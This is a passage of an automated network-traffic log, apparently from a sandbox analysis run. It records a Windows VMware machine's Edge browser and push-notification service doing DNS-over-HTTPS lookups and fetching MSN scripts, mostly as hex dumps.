                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                                                                            Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                                                                            Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                                                                            Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                                                                            Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                                                                            Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:21 UTC1390INData Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63
                                                                                                                                                                                                                                                                                                                            Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            4192.168.2.649820162.159.61.34437232C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:22 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:22 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:22 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 07:39:22 GMT
                                                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                                                            CF-RAY: 8fd1d06c7c517283-EWR
                                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:22 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 eb 00 04 8e fb 28 83 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom()


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            5192.168.2.649821172.64.41.34437232C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:22 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:22 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:23 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 07:39:22 GMT
                                                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                                                            CF-RAY: 8fd1d06c88c5c34e-EWR
                                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:23 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 e7 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcomP#)


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            6192.168.2.649822172.64.41.34437232C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:22 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            Content-Length: 128
                                                                                                                                                                                                                                                                                                                            Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                            Accept-Language: *
                                                                                                                                                                                                                                                                                                                            User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:22 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:23 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 07:39:23 GMT
                                                                                                                                                                                                                                                                                                                            Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                                                                                                                            CF-RAY: 8fd1d06cc850425d-EWR
                                                                                                                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:23 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 25 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                            Data Ascii: wwwgstaticcom% c)


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                            7192.168.2.64985340.113.110.67443
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 54 59 6a 67 2f 55 43 5a 56 6b 69 6d 68 50 61 63 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 39 64 31 35 38 64 37 39 33 33 35 32 31 32 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: TYjg/UCZVkimhPac.1Context: 3a9d158d79335212
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 54 59 6a 67 2f 55 43 5a 56 6b 69 6d 68 50 61 63 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 39 64 31 35 38 64 37 39 33 33 35 32 31 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 5a 77 54 61 72 59 33 54 42 4f 31 49 66 75 66 6c 35 59 31 63 50 6b 47 50 36 38 74 52 72 2f 6c 41 74 6f 68 31 61 64 61 2b 58 36 6e 5a 52 4c 37 6b 33 57 78 42 77 52 74 6a 68 6d 30 31 4f 70 48 6e 48 41 31 4c 73 46 53 46 65 63 54 67 42 66 58 72 78 41 56 32 58 36 76 78 72 47 7a 46 2f 6c 58 71 6f 62 46 35 66 66 44 70 6b 72 50 69 73
                                                                                                                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: TYjg/UCZVkimhPac.2Context: 3a9d158d79335212<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAZwTarY3TBO1Ifufl5Y1cPkGP68tRr/lAtoh1ada+X6nZRL7k3WxBwRtjhm01OpHnHA1LsFSFecTgBfXrxAV2X6vxrGzF/lXqobF5ffDpkrPis
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 54 59 6a 67 2f 55 43 5a 56 6b 69 6d 68 50 61 63 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 61 39 64 31 35 38 64 37 39 33 33 35 32 31 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: TYjg/UCZVkimhPac.3Context: 3a9d158d79335212<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC58INData Raw: 4d 53 2d 43 56 3a 20 75 33 75 46 30 75 48 73 45 55 69 38 61 58 79 45 4e 4d 58 43 71 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                                            Data Ascii: MS-CV: u3uF0uHsEUi8aXyENMXCqA.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                            8192.168.2.64986723.209.72.74437232C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC627OUTGET /bundles/v1/edgeChromium/latest/vendors.b4742062efdd1e38bfac.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                            Host: assets.msn.com
                                                                                                                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                                                                                                                            sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                            Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                                                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                            Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                            2025-01-05 07:39:26 UTC1238INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                            Content-MD5: OvDHew0ZSmhxFV5Y7hCEsQ==
                                                                                                                                                                                                                                                                                                                            Last-Modified: Sat, 21 Dec 2024 00:40:22 GMT
                                                                                                                                                                                                                                                                                                                            ETag: 0x8DD21580D62BC01
                                                                                                                                                                                                                                                                                                                            Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                            x-ms-request-id: fd00acba-001e-0066-20bc-5b153f000000
                                                                                                                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                            Date: Sun, 05 Jan 2025 07:39:26 GMT
                                                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                                                            Connection: Transfer-Encoding
                                                                                                                                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                            Akamai-Request-BC: [a=23.210.4.153,b=2376667769,c=g,n=US_NJ_SECAUCUS,o=20940]
                                                                                                                                                                                                                                                                                                                            Server-Timing: clientrtt; dur=2, clienttt; dur=1, origin; dur=0, cdntime; dur=1, wpo;dur=0,1s;dur=0
                                                                                                                                                                                                                                                                                                                            Akamai-Cache-Status: Hit from child
                                                                                                                                                                                                                                                                                                                            Akamai-Server-IP: 23.210.4.153
                                                                                                                                                                                                                                                                                                                            Akamai-Request-ID: 8da91279
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                            Access-Control-Allow-Origin: https://ntp.msn.com
